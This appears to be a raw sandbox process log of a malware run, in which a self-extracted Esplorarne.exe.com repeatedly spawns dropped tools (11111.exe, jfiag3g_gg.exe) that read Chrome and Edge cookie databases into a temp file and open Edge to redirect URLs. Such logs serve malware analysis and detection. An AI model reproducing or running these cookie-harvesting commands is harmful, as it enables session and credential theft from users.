C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 436 -p 2608 -ip 2608
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2608 -s 1132
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\system32\sihost.exe
sihost.exe
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\explorer.exe
explorer.exe /LOADSAVEDWINDOWS
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851483
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x1e4,0x1e8,0x1ec,0x1c0,0x1f0,0x7ffef13646f8,0x7ffef1364708,0x7ffef1364718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3908 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6424 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851513
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffef13646f8,0x7ffef1364708,0x7ffef1364718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2172 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3912 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3600 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5524 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6380 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5820 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6444 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=2087215
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffef13646f8,0x7ffef1364708,0x7ffef1364718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4828 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,12784720089758348689,17719243171340700388,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5844 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=4263119
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
